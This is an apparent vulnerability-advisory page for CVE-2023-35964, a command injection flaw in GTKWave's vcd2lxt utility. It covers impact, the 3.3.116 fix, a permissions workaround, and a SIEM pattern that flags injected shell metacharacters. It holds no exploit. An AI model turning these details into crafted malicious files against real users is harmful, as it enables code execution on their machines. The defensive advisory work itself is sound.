Login Sign Up

CVE-2023-35964

7.8 HIGH
Remote Code Execution

📋 TL;DR

This CVE allows arbitrary command execution through OS command injection in GTKWave's vcd2lxt utility when processing specially crafted wave files. Attackers can achieve remote code execution by tricking users into opening malicious files. Users of GTKWave 3.3.115 who process untrusted wave files are affected.

💻 Affected Systems

Products:
  • GTKWave
Versions: 3.3.115
Operating Systems: Linux, Windows, macOS
Default Config Vulnerable: ⚠️ Yes
Notes: Vulnerability is in the vcd2lxt utility used for decompressing wave files; any use of this utility with untrusted input is vulnerable.

📦 What is this software?

Gtkwave by Tonybybell

View all CVEs affecting Gtkwave →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Full system compromise with attacker gaining the same privileges as the user running GTKWave, potentially leading to data theft, ransomware deployment, or lateral movement.

🟠

Likely Case

Local privilege escalation or arbitrary command execution in the context of the user opening the malicious file, potentially leading to data exfiltration or malware installation.

🟢

If Mitigated

Limited impact if running with minimal privileges, in sandboxed environments, or with proper file validation controls.

🌐 Internet-Facing: LOW
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires user interaction (opening malicious file); detailed technical analysis available in Talos reports.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 3.3.116 or later

Vendor Advisory: https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html

Restart Required: No

Instructions:

1. Check current GTKWave version. 2. Update to version 3.3.116 or later from official repositories. 3. Verify the update was successful.

🔧 Temporary Workarounds

Disable vcd2lxt utility

linux

Remove or restrict execute permissions on the vcd2lxt binary to prevent exploitation.

sudo chmod -x /usr/bin/vcd2lxt

Use file validation

all

Implement strict file validation and only open wave files from trusted sources.

🧯 If You Can't Patch

  • Run GTKWave with minimal user privileges (non-root/non-admin)
  • Use application sandboxing or containerization to limit potential damage

🔍 How to Verify

Check if Vulnerable:

Check if GTKWave version is 3.3.115: 'gtkwave --version' or 'vcd2lxt --version'

Check Version:

gtkwave --version

Verify Fix Applied:

Confirm version is 3.3.116 or later: 'gtkwave --version'

📡 Detection & Monitoring

Log Indicators:

  • Unusual process execution from GTKWave or vcd2lxt
  • Suspicious command-line arguments passed to vcd2lxt

Network Indicators:

  • Unexpected outbound connections from GTKWave processes

SIEM Query:

Process creation where parent process contains 'gtkwave' or 'vcd2lxt' and command line contains suspicious patterns like ';', '|', '&', or '`'

📊 Metadata

CVE ID: CVE-2023-35964
CVSS v3 Score: 7.8 (HIGH)
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE: CWE-78
Published: January 8, 2024
Last Updated: November 4, 2025

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2023-35964, you might also want to check these:

CVE-2023-2564 10.0

This CVE describes an OS command injection vulnerability in scanservjs web scanning software that al...

Same vulnerability type (CWE-78)
CVE-2024-58338 10.0

Anevia Flamingo XL 3.2.9 contains a restricted shell escape vulnerability that allows remote attacke...

Same vulnerability type (CWE-78)
CVE-2025-26389 10.0

This critical vulnerability allows unauthenticated remote attackers to execute arbitrary code with r...

Same vulnerability type (CWE-78)